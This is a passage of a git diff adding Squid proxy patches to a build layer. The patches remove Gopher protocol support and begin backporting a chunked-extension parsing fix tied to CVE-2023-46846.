"gopher.h" + #include "hier_code.h" + #include "http.h" + #include "http/Stream.h" +@@ -1004,10 +1003,6 @@ FwdState::dispatch() + httpStart(this); + break; + +- case AnyP::PROTO_GOPHER: +- gopherStart(this); +- break; +- + case AnyP::PROTO_FTP: + if (request->flags.ftpNative) + Ftp::StartRelay(this); +--- a/src/HttpRequest.cc ++++ b/src/HttpRequest.cc +@@ -18,7 +18,6 @@ + #include "Downloader.h" + #include "err_detail_type.h" + #include "globals.h" +-#include "gopher.h" + #include "http.h" + #include "http/one/RequestParser.h" + #include "http/Stream.h" +@@ -556,11 +555,6 @@ HttpRequest::maybeCacheable() + return false; + break; + +- case AnyP::PROTO_GOPHER: +- if (!gopherCachable(this)) +- return false; +- break; +- + case AnyP::PROTO_CACHE_OBJECT: + return false; + +--- a/src/IoStats.h ++++ b/src/IoStats.h +@@ -22,7 +22,7 @@ public: + int writes; + int write_hist[histSize]; + } +- Http, Ftp, Gopher; ++ Http, Ftp; + }; + + #endif /* SQUID_IOSTATS_H_ */ +--- a/src/Makefile.am ++++ b/src/Makefile.am +@@ -306,8 +306,6 @@ squid_SOURCES = \ + FwdState.h \ + Generic.h \ + globals.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + helper.h \ + hier_code.h \ +@@ -1259,8 +1257,6 @@ tests_testCacheManager_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + hier_code.h \ + helper.cc \ + $(HTCPSOURCE) \ +@@ -1678,8 +1674,6 @@ tests_testEvent_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -1914,8 +1908,6 @@ tests_testEventLoop_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -2145,8 +2137,6 @@ tests_test_http_range_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -2461,8 +2451,6 @@ tests_testHttpRequest_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -3307,8 +3295,6 @@ tests_testURL_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +--- a/src/adaptation/ecap/Host.cc ++++ b/src/adaptation/ecap/Host.cc +@@ -49,7 +49,6 @@ Adaptation::Ecap::Host::Host() + libecap::protocolHttp.assignHostId(AnyP::PROTO_HTTP); + libecap::protocolHttps.assignHostId(AnyP::PROTO_HTTPS); + libecap::protocolFtp.assignHostId(AnyP::PROTO_FTP); +- libecap::protocolGopher.assignHostId(AnyP::PROTO_GOPHER); + libecap::protocolWais.assignHostId(AnyP::PROTO_WAIS); + libecap::protocolUrn.assignHostId(AnyP::PROTO_URN); + libecap::protocolWhois.assignHostId(AnyP::PROTO_WHOIS); +--- a/src/adaptation/ecap/MessageRep.cc ++++ b/src/adaptation/ecap/MessageRep.cc +@@ -140,8 +140,6 @@ Adaptation::Ecap::FirstLineRep::protocol + return libecap::protocolHttps; + case AnyP::PROTO_FTP: + return libecap::protocolFtp; +- case AnyP::PROTO_GOPHER: +- return libecap::protocolGopher; + case AnyP::PROTO_WAIS: + return libecap::protocolWais; + case AnyP::PROTO_WHOIS: +--- a/src/anyp/ProtocolType.h ++++ b/src/anyp/ProtocolType.h +@@ -27,7 +27,6 @@ typedef enum { + PROTO_HTTPS, + PROTO_COAP, + PROTO_COAPS, +- PROTO_GOPHER, + PROTO_WAIS, + PROTO_CACHE_OBJECT, + PROTO_ICP, +--- a/src/anyp/Uri.cc ++++ b/src/anyp/Uri.cc +@@ -852,8 +852,6 @@ urlCheckRequest(const HttpRequest * r) + if (r->method == Http::METHOD_PUT) + rc = 1; + +- case AnyP::PROTO_GOPHER: +- + case AnyP::PROTO_WAIS: + + case AnyP::PROTO_WHOIS: +--- a/src/anyp/UriScheme.cc ++++ b/src/anyp/UriScheme.cc +@@ -87,9 +87,6 @@ AnyP::UriScheme::defaultPort() const + // Assuming IANA policy of allocating same port for base and TLS protocol versions will occur. + return 5683; + +- case AnyP::PROTO_GOPHER: +- return 70; +- + case AnyP::PROTO_WAIS: + return 210; + +--- a/src/client_side_request.cc ++++ b/src/client_side_request.cc +@@ -33,7 +33,6 @@ + #include "fd.h" + #include "fde.h" + #include "format/Token.h" +-#include "gopher.h" + #include "helper.h" + #include "helper/Reply.h" + #include "http.h" +@@ -965,9 +964,6 @@ clientHierarchical(ClientHttpRequest * h + if (request->url.getScheme() == AnyP::PROTO_HTTP) + return method.respMaybeCacheable(); + +- if (request->url.getScheme() == AnyP::PROTO_GOPHER) +- return gopherCachable(request); +- + if (request->url.getScheme() == AnyP::PROTO_CACHE_OBJECT) + return 0; + +--- a/src/err_type.h ++++ b/src/err_type.h +@@ -65,7 +65,7 @@ typedef enum { + ERR_GATEWAY_FAILURE, + + /* Special Cases */ +- ERR_DIR_LISTING, /* Display of remote directory (FTP, Gopher) */ ++ ERR_DIR_LISTING, /* Display of remote directory (FTP) */ + ERR_SQUID_SIGNATURE, /* not really an error */ + ERR_SHUTTING_DOWN, + ERR_PROTOCOL_UNKNOWN, +--- a/src/HttpMsg.h ++++ b/src/HttpMsg.h +@@ -38,7 +38,6 @@ public: + srcFtp = 1 << (16 + 1), ///< ftp_port or FTP server + srcIcap = 1 << (16 + 2), ///< traditional ICAP service without encryption + srcEcap = 1 << (16 + 3), ///< eCAP service that uses insecure libraries/daemons +- srcGopher = 1 << (16 + 14), ///< Gopher server + srcWhois = 1 << (16 + 15), ///< Whois server + srcUnsafe = 0xFFFF0000, ///< Unsafe sources mask + srcSafe = 0x0000FFFF ///< Safe sources mask +--- a/src/mgr/IoAction.cc ++++ b/src/mgr/IoAction.cc +@@ -35,9 +35,6 @@ Mgr::IoActionData::operator += (const Io + ftp_reads += stats.ftp_reads; + for (int i = 0; i < IoStats::histSize; ++i) + ftp_read_hist[i] += stats.ftp_read_hist[i]; +- gopher_reads += stats.gopher_reads; +- for (int i = 0; i < IoStats::histSize; ++i) +- gopher_read_hist[i] += stats.gopher_read_hist[i]; + + return *this; + } +--- a/src/mgr/IoAction.h ++++ b/src/mgr/IoAction.h +@@ -27,10 +27,8 @@ public: + public: + double http_reads; + double ftp_reads; +- double gopher_reads; + double http_read_hist[IoStats::histSize]; + double ftp_read_hist[IoStats::histSize]; +- double gopher_read_hist[IoStats::histSize]; + }; + + /// implement aggregated 'io' action +--- a/src/stat.cc ++++ b/src/stat.cc +@@ -206,12 +206,6 @@ GetIoStats(Mgr::IoActionData& stats) + for (i = 0; i < IoStats::histSize; ++i) { + stats.ftp_read_hist[i] = IOStats.Ftp.read_hist[i]; + } +- +- stats.gopher_reads = IOStats.Gopher.reads; +- +- for (i = 0; i < IoStats::histSize; ++i) { +- stats.gopher_read_hist[i] = IOStats.Gopher.read_hist[i]; +- } + } + + void +@@ -245,19 +239,6 @@ DumpIoStats(Mgr::IoActionData& stats, St + } + + storeAppendPrintf(sentry, "\n"); +- storeAppendPrintf(sentry, "Gopher I/O\n"); +- storeAppendPrintf(sentry, "number of reads: %.0f\n", stats.gopher_reads); +- storeAppendPrintf(sentry, "Read Histogram:\n"); +- +- for (i = 0; i < IoStats::histSize; ++i) { +- storeAppendPrintf(sentry, "%5d-%5d: %9.0f %2.0f%%\n", +- i ? (1 << (i - 1)) + 1 : 1, +- 1 << i, +- stats.gopher_read_hist[i], +- Math::doublePercent(stats.gopher_read_hist[i], stats.gopher_reads)); +- } +- +- storeAppendPrintf(sentry, "\n"); + } + + static const char * +--- a/src/Makefile.in ++++ b/src/Makefile.in +@@ -263,7 +263,7 @@ am__squid_SOURCES_DIST = AclRegs.cc Auth + ExternalACL.h ExternalACLEntry.cc ExternalACLEntry.h \ + FadingCounter.h FadingCounter.cc fatal.h fatal.cc fd.h fd.cc \ + fde.cc fde.h FileMap.h filemap.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h Generic.h globals.h gopher.h gopher.cc \ ++ FwdState.cc FwdState.h Generic.h globals.h \ + helper.cc helper.h hier_code.h HierarchyLogEntry.h htcp.cc \ + htcp.h http.cc http.h HttpHeaderFieldStat.h HttpHdrCc.h \ + HttpHdrCc.cc HttpHdrCc.cci HttpHdrRange.cc HttpHdrSc.cc \ +@@ -352,7 +352,7 @@ am_squid_OBJECTS = $(am__objects_1) Acce + EventLoop.$(OBJEXT) external_acl.$(OBJEXT) \ + ExternalACLEntry.$(OBJEXT) FadingCounter.$(OBJEXT) \ + fatal.$(OBJEXT) fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpHdrCc.$(OBJEXT) HttpHdrRange.$(OBJEXT) HttpHdrSc.$(OBJEXT) \ + HttpHdrScTarget.$(OBJEXT) HttpHdrContRange.$(OBJEXT) \ +@@ -539,7 +539,7 @@ am__tests_testCacheManager_SOURCES_DIST + tests/stub_ETag.cc event.cc external_acl.cc \ + ExternalACLEntry.cc fatal.h tests/stub_fatal.cc fd.h fd.cc \ + fde.cc FileMap.h filemap.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h gopher.h gopher.cc hier_code.h \ ++ FwdState.cc FwdState.h hier_code.h \ + helper.cc htcp.cc htcp.h http.cc HttpBody.h HttpBody.cc \ + HttpHeader.h HttpHeader.cc HttpHeaderFieldInfo.h \ + HttpHeaderTools.h HttpHeaderTools.cc HttpHeaderFieldStat.h \ +@@ -594,7 +594,7 @@ am_tests_testCacheManager_OBJECTS = Acce + event.$(OBJEXT) external_acl.$(OBJEXT) \ + ExternalACLEntry.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) HttpHeader.$(OBJEXT) \ + HttpHeaderTools.$(OBJEXT) HttpHdrCc.$(OBJEXT) \ +@@ -838,7 +838,7 @@ am__tests_testEvent_SOURCES_DIST = Acces + EventLoop.h EventLoop.cc external_acl.cc ExternalACLEntry.cc \ + FadingCounter.cc fatal.h tests/stub_fatal.cc fd.h fd.cc fde.cc \ + FileMap.h filemap.cc fqdncache.h fqdncache.cc FwdState.cc \ +- FwdState.h gopher.h gopher.cc helper.cc hier_code.h htcp.cc \ ++ FwdState.h helper.cc hier_code.h htcp.cc \ + htcp.h http.cc HttpBody.h HttpBody.cc \ + tests/stub_HttpControlMsg.cc HttpHeader.h HttpHeader.cc \ + HttpHeaderFieldInfo.h HttpHeaderTools.h HttpHeaderTools.cc \ +@@ -891,7 +891,7 @@ am_tests_testEvent_OBJECTS = AccessLogEn + external_acl.$(OBJEXT) ExternalACLEntry.$(OBJEXT) \ + FadingCounter.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHeader.$(OBJEXT) HttpHeaderTools.$(OBJEXT) \ +@@ -975,8 +975,8 @@ am__tests_testEventLoop_SOURCES_DIST = A + tests/stub_ETag.cc EventLoop.h EventLoop.cc event.cc \ + external_acl.cc ExternalACLEntry.cc FadingCounter.cc fatal.h \ + tests/stub_fatal.cc fd.h fd.cc fde.cc FileMap.h filemap.cc \ +- fqdncache.h fqdncache.cc FwdState.cc FwdState.h gopher.h \ +- gopher.cc helper.cc hier_code.h htcp.cc htcp.h http.cc \ ++ fqdncache.h fqdncache.cc FwdState.cc FwdState.h \ ++ helper.cc hier_code.h htcp.cc htcp.h http.cc \ + HttpBody.h HttpBody.cc tests/stub_HttpControlMsg.cc \ + HttpHeader.h HttpHeader.cc HttpHeaderFieldInfo.h \ + HttpHeaderTools.h HttpHeaderTools.cc HttpHeaderFieldStat.h \ +@@ -1029,7 +1029,7 @@ am_tests_testEventLoop_OBJECTS = AccessL + external_acl.$(OBJEXT) ExternalACLEntry.$(OBJEXT) \ + FadingCounter.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHeader.$(OBJEXT) HttpHeaderTools.$(OBJEXT) \ +@@ -1187,7 +1187,7 @@ am__tests_testHttpRequest_SOURCES_DIST = + fs_io.cc dlink.h dlink.cc dns_internal.cc errorpage.cc \ + tests/stub_ETag.cc external_acl.cc ExternalACLEntry.cc fatal.h \ + tests/stub_fatal.cc fd.h fd.cc fde.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h gopher.h gopher.cc helper.cc \ ++ FwdState.cc FwdState.h helper.cc \ + hier_code.h htcp.cc htcp.h http.cc HttpBody.h HttpBody.cc \ + tests/stub_HttpControlMsg.cc HttpHeader.h HttpHeader.cc \ + HttpHeaderFieldInfo.h HttpHeaderTools.h HttpHeaderTools.cc \ +@@ -1243,7 +1243,7 @@ am_tests_testHttpRequest_OBJECTS = Acces + $(am__objects_4) errorpage.$(OBJEXT) tests/stub_ETag.$(OBJEXT) \ + external_acl.$(OBJEXT) ExternalACLEntry.$(OBJEXT) \ + tests/stub_fatal.$(OBJEXT) fd.$(OBJEXT) fde.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHeader.$(OBJEXT) HttpHeaderTools.$(OBJEXT) \ +@@ -1670,8 +1670,8 @@ am__tests_testURL_SOURCES_DIST = AccessL + fs_io.cc dlink.h dlink.cc dns_internal.cc errorpage.cc ETag.cc \ + event.cc external_acl.cc ExternalACLEntry.cc fatal.h \ + tests/stub_fatal.cc fd.h fd.cc fde.cc FileMap.h filemap.cc \ +- fqdncache.h fqdncache.cc FwdState.cc FwdState.h gopher.h \ +- gopher.cc helper.cc hier_code.h htcp.cc htcp.h http.cc \ ++ fqdncache.h fqdncache.cc FwdState.cc FwdState.h \ ++ helper.cc hier_code.h htcp.cc htcp.h http.cc \ + HttpBody.h HttpBody.cc tests/stub_HttpControlMsg.cc \ + HttpHeaderFieldStat.h HttpHdrCc.h HttpHdrCc.cc HttpHdrCc.cci \ + HttpHdrContRange.cc HttpHdrRange.cc HttpHdrSc.cc \ +@@ -1725,7 +1725,7 @@ am_tests_testURL_OBJECTS = AccessLogEntr + event.$(OBJEXT) external_acl.$(OBJEXT) \ + ExternalACLEntry.$(OBJEXT) tests/stub_fatal.$(OBJEXT) \ + fd.$(OBJEXT) fde.$(OBJEXT) filemap.$(OBJEXT) \ +- fqdncache.$(OBJEXT) FwdState.$(OBJEXT) gopher.$(OBJEXT) \ ++ fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ + helper.$(OBJEXT) $(am__objects_5) http.$(OBJEXT) \ + HttpBody.$(OBJEXT) tests/stub_HttpControlMsg.$(OBJEXT) \ + HttpHdrCc.$(OBJEXT) HttpHdrContRange.$(OBJEXT) \ +@@ -1925,8 +1925,8 @@ am__tests_test_http_range_SOURCES_DIST = + dns_internal.cc errorpage.cc tests/stub_ETag.cc event.cc \ + FadingCounter.cc fatal.h tests/stub_libauth.cc \ + tests/stub_fatal.cc fd.h fd.cc fde.cc FileMap.h filemap.cc \ +- fqdncache.h fqdncache.cc FwdState.cc FwdState.h gopher.h \ +- gopher.cc helper.cc hier_code.h htcp.cc htcp.h http.cc \ ++ fqdncache.h fqdncache.cc FwdState.cc FwdState.h \ ++ helper.cc hier_code.h htcp.cc htcp.h http.cc \ + HttpBody.h HttpBody.cc tests/stub_HttpControlMsg.cc \ + HttpHeaderFieldStat.h HttpHdrCc.h HttpHdrCc.cc HttpHdrCc.cci \ + HttpHdrContRange.cc HttpHdrRange.cc HttpHdrSc.cc \ +@@ -1979,7 +1979,7 @@ am_tests_test_http_range_OBJECTS = Acces + FadingCounter.$(OBJEXT) tests/stub_libauth.$(OBJEXT) \ + tests/stub_fatal.$(OBJEXT) fd.$(OBJEXT) fde.$(OBJEXT) \ + filemap.$(OBJEXT) fqdncache.$(OBJEXT) FwdState.$(OBJEXT) \ +- gopher.$(OBJEXT) helper.$(OBJEXT) $(am__objects_5) \ ++ helper.$(OBJEXT) $(am__objects_5) \ + http.$(OBJEXT) HttpBody.$(OBJEXT) \ + tests/stub_HttpControlMsg.$(OBJEXT) HttpHdrCc.$(OBJEXT) \ + HttpHdrContRange.$(OBJEXT) HttpHdrRange.$(OBJEXT) \ +@@ -2131,7 +2131,7 @@ am__depfiles_remade = ./$(DEPDIR)/Access + ./$(DEPDIR)/external_acl.Po ./$(DEPDIR)/fatal.Po \ + ./$(DEPDIR)/fd.Po ./$(DEPDIR)/fde.Po ./$(DEPDIR)/filemap.Po \ + ./$(DEPDIR)/fqdncache.Po ./$(DEPDIR)/fs_io.Po \ +- ./$(DEPDIR)/globals.Po ./$(DEPDIR)/gopher.Po \ ++ ./$(DEPDIR)/globals.Po \ + ./$(DEPDIR)/helper.Po ./$(DEPDIR)/hier_code.Po \ + ./$(DEPDIR)/htcp.Po ./$(DEPDIR)/http.Po \ + ./$(DEPDIR)/icp_opcode.Po ./$(DEPDIR)/icp_v2.Po \ +@@ -3043,7 +3043,7 @@ squid_SOURCES = $(ACL_REGISTRATION_SOURC + ExternalACL.h ExternalACLEntry.cc ExternalACLEntry.h \ + FadingCounter.h FadingCounter.cc fatal.h fatal.cc fd.h fd.cc \ + fde.cc fde.h FileMap.h filemap.cc fqdncache.h fqdncache.cc \ +- FwdState.cc FwdState.h Generic.h globals.h gopher.h gopher.cc \ ++ FwdState.cc FwdState.h Generic.h globals.h \ + helper.cc helper.h hier_code.h HierarchyLogEntry.h \ + $(HTCPSOURCE) http.cc http.h HttpHeaderFieldStat.h HttpHdrCc.h \ + HttpHdrCc.cc HttpHdrCc.cci HttpHdrRange.cc HttpHdrSc.cc \ +@@ -3708,8 +3708,6 @@ tests_testCacheManager_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + hier_code.h \ + helper.cc \ + $(HTCPSOURCE) \ +@@ -4134,8 +4132,6 @@ tests_testEvent_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -4371,8 +4367,6 @@ tests_testEventLoop_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -4604,8 +4598,6 @@ tests_test_http_range_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -4924,8 +4916,6 @@ tests_testHttpRequest_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -5777,8 +5767,6 @@ tests_testURL_SOURCES = \ + fqdncache.cc \ + FwdState.cc \ + FwdState.h \ +- gopher.h \ +- gopher.cc \ + helper.cc \ + hier_code.h \ + $(HTCPSOURCE) \ +@@ -6823,7 +6811,6 @@ distclean-compile: + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/fqdncache.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/fs_io.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/globals.Po@am__quote@ # am--include-marker +-@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/gopher.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/helper.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/hier_code.Po@am__quote@ # am--include-marker + @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/htcp.Po@am__quote@ # am--include-marker +@@ -7804,7 +7791,6 @@ distclean: distclean-recursive + -rm -f ./$(DEPDIR)/fqdncache.Po + -rm -f ./$(DEPDIR)/fs_io.Po + -rm -f ./$(DEPDIR)/globals.Po +- -rm -f ./$(DEPDIR)/gopher.Po + -rm -f ./$(DEPDIR)/helper.Po + -rm -f ./$(DEPDIR)/hier_code.Po + -rm -f ./$(DEPDIR)/htcp.Po +@@ -8129,7 +8115,6 @@ maintainer-clean: maintainer-clean-recur + -rm -f ./$(DEPDIR)/fqdncache.Po + -rm -f ./$(DEPDIR)/fs_io.Po + -rm -f ./$(DEPDIR)/globals.Po +- -rm -f ./$(DEPDIR)/gopher.Po + -rm -f ./$(DEPDIR)/helper.Po + -rm -f ./$(DEPDIR)/hier_code.Po + -rm -f ./$(DEPDIR)/htcp.Po diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46846-pre1.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846-pre1.patch new file mode 100644 index 0000000000..5b4e370d49 --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846-pre1.patch @@ -0,0 +1,1154 @@ +Backport of: + +From 417da4006cf5c97d44e74431b816fc58fec9e270 Mon Sep 17 00:00:00 2001 +From: Eduard Bagdasaryan <eduard.bagdasaryan@measurement-factory.com> +Date: Mon, 18 Mar 2019 17:48:21 +0000 +Subject: [PATCH] Fix incremental parsing of chunked quoted extensions (#310) + +Before this change, incremental parsing of quoted chunked extensions +was broken for two reasons: + +* Http::One::Parser::skipLineTerminator() unexpectedly threw after + partially received quoted chunk extension value. + +* When Http::One::Tokenizer was unable to parse a quoted extension, + it incorrectly restored the input buffer to the beginning of the + extension value (instead of the extension itself), thus making + further incremental parsing iterations impossible. + +IMO, the reason for this problem was that Http::One::Tokenizer::qdText() +could not distinguish two cases (returning false in both): + +* the end of the quoted string not yet reached + +* an input error, e.g., wrong/unexpected character + +A possible approach could be to improve Http::One::Tokenizer, making it +aware about "needs more data" state. However, to be acceptable, +these improvements should be done in the base Parser::Tokenizer +class instead. These changes seem to be non-trivial and could be +done separately and later. + +Another approach, used here, is to simplify the complex and error-prone +chunked extensions parsing algorithm, fixing incremental parsing bugs +and still parse incrementally in almost all cases. The performance +regression could be expected only in relatively rare cases of partially +received or malformed extensions. + +Also: +* fixed parsing of partial use-original-body extension values +* do not treat an invalid use-original-body as an unknown extension +* optimization: parse use-original-body extension only in ICAP context + (i.e., where it is expected) +* improvement: added a new API to TeChunkedParser to specify known + chunked extensions list + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/squid/tree/debian/patches/CVE-2023-46846-pre1.patch?h=ubuntu/focal-security&id=9ccd217ca9428c9a6597e9310a99552026b245fa +Upstream commit https://github.com/squid-cache/squid/commit/417da4006cf5c97d44e74431b816fc58fec9e270] +CVE: CVE-2023-46846 #Dependency Patch1 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + src/adaptation/icap/ModXact.cc | 21 ++++- + src/adaptation/icap/ModXact.h | 20 +++++ + src/http/one/Parser.cc | 35 ++++---- + src/http/one/Parser.h | 10 ++- + src/http/one/RequestParser.cc | 16 ++-- + src/http/one/RequestParser.h | 8 +- + src/http/one/ResponseParser.cc | 17 ++-- + src/http/one/ResponseParser.h | 2 +- + src/http/one/TeChunkedParser.cc | 139 ++++++++++++++++++-------------- + src/http/one/TeChunkedParser.h | 41 ++++++++-- + src/http/one/Tokenizer.cc | 104 ++++++++++++------------ + src/http/one/Tokenizer.h | 89 ++++++++------------ + src/http/one/forward.h | 3 + + src/parser/BinaryTokenizer.h | 3 +- + src/parser/Makefile.am | 1 + + src/parser/Tokenizer.cc | 40 +++++++++ + src/parser/Tokenizer.h | 13 +++ + src/parser/forward.h | 22 +++++ + 18 files changed, 364 insertions(+), 220 deletions(-) + create mode 100644 src/parser/forward.h + +--- a/src/adaptation/icap/ModXact.cc ++++ b/src/adaptation/icap/ModXact.cc +@@ -25,12 +25,13 @@ + #include "comm.h" + #include "comm/Connection.h" + #include "err_detail_type.h" +-#include "http/one/TeChunkedParser.h" + #include "HttpHeaderTools.h" + #include "HttpMsg.h" + #include "HttpReply.h" + #include "HttpRequest.h" + #include "MasterXaction.h" ++#include "parser/Tokenizer.h" ++#include "sbuf/Stream.h" + #include "SquidTime.h" + + // flow and terminology: +@@ -44,6 +45,8 @@ CBDATA_NAMESPACED_CLASS_INIT(Adaptation: + + static const size_t TheBackupLimit = BodyPipe::MaxCapacity; + ++const SBuf Adaptation::Icap::ChunkExtensionValueParser::UseOriginalBodyName("use-original-body"); ++ + Adaptation::Icap::ModXact::State::State() + { + memset(this, 0, sizeof(*this)); +@@ -1108,6 +1111,7 @@ void Adaptation::Icap::ModXact::decideOn + state.parsing = State::psBody; + replyHttpBodySize = 0; + bodyParser = new Http1::TeChunkedParser; ++ bodyParser->parseExtensionValuesWith(&extensionParser); + makeAdaptedBodyPipe("adapted response from the ICAP server"); + Must(state.sending == State::sendingAdapted); + } else { +@@ -1142,9 +1146,8 @@ void Adaptation::Icap::ModXact::parseBod + } + + if (parsed) { +- if (state.readyForUob && bodyParser->useOriginBody >= 0) { +- prepPartialBodyEchoing( +- static_cast<uint64_t>(bodyParser->useOriginBody)); ++ if (state.readyForUob && extensionParser.sawUseOriginalBody()) { ++ prepPartialBodyEchoing(extensionParser.useOriginalBody()); + stopParsing(); + return; + } +@@ -2014,3 +2017,14 @@ void Adaptation::Icap::ModXactLauncher:: + } + } + ++void ++Adaptation::Icap::ChunkExtensionValueParser::parse(Tokenizer &tok, const SBuf &extName) ++{ ++ if (extName == UseOriginalBodyName) { ++ useOriginalBody_ = tok.udec64("use-original-body"); ++ assert(useOriginalBody_ >= 0); ++ } else { ++ Ignore(tok, extName); ++ } ++} ++ +--- a/src/adaptation/icap/ModXact.h ++++ b/src/adaptation/icap/ModXact.h +@@ -15,6 +15,7 @@ + #include "adaptation/icap/Xaction.h" + #include "BodyPipe.h" + #include "http/one/forward.h" ++#include "http/one/TeChunkedParser.h" + + /* + * ICAPModXact implements ICAP REQMOD and RESPMOD transaction using +@@ -105,6 +106,23 @@ private: + enum State { stDisabled, stWriting, stIeof, stDone } theState; + }; + ++/// handles ICAP-specific chunk extensions supported by Squid ++class ChunkExtensionValueParser: public Http1::ChunkExtensionValueParser ++{ ++public: ++ /* Http1::ChunkExtensionValueParser API */ ++ virtual void parse(Tokenizer &tok, const SBuf &extName) override; ++ ++ bool sawUseOriginalBody() const { return useOriginalBody_ >= 0; } ++ uint64_t useOriginalBody() const { assert(sawUseOriginalBody()); return static_cast<uint64_t>(useOriginalBody_); } ++ ++private: ++ static const SBuf UseOriginalBodyName; ++ ++ /// the value of the parsed use-original-body chunk extension (or -1) ++ int64_t useOriginalBody_ = -1; ++}; ++ + class ModXact: public Xaction, public BodyProducer, public BodyConsumer + { + CBDATA_CLASS(ModXact); +@@ -270,6 +288,8 @@ private: + + int adaptHistoryId; ///< adaptation history slot reservation + ++ ChunkExtensionValueParser extensionParser; ++ + class State + { + +--- a/src/http/one/Parser.cc ++++ b/src/http/one/Parser.cc +@@ -7,10 +7,11 @@ + */ + + #include "squid.h" ++#include "base/CharacterSet.h" + #include "Debug.h" + #include "http/one/Parser.h" +-#include "http/one/Tokenizer.h" + #include "mime_header.h" ++#include "parser/Tokenizer.h" + #include "SquidConfig.h" + + /// RFC 7230 section 2.6 - 7 magic octets +@@ -61,20 +62,19 @@ Http::One::Parser::DelimiterCharacters() + RelaxedDelimiterCharacters() : CharacterSet::SP; + } + +-bool +-Http::One::Parser::skipLineTerminator(Http1::Tokenizer &tok) const ++void ++Http::One::Parser::skipLineTerminator(Tokenizer &tok) const + { + if (tok.skip(Http1::CrLf())) +- return true; ++ return; + + if (Config.onoff.relaxed_header_parser && tok.skipOne(CharacterSet::LF)) +- return true; ++ return; + + if (tok.atEnd() || (tok.remaining().length() == 1 && tok.remaining().at(0) == '\r')) +- return false; // need more data ++ throw InsufficientInput(); + + throw TexcHere("garbage instead of CRLF line terminator"); +- return false; // unreachable, but make naive compilers happy + } + + /// all characters except the LF line terminator +@@ -102,7 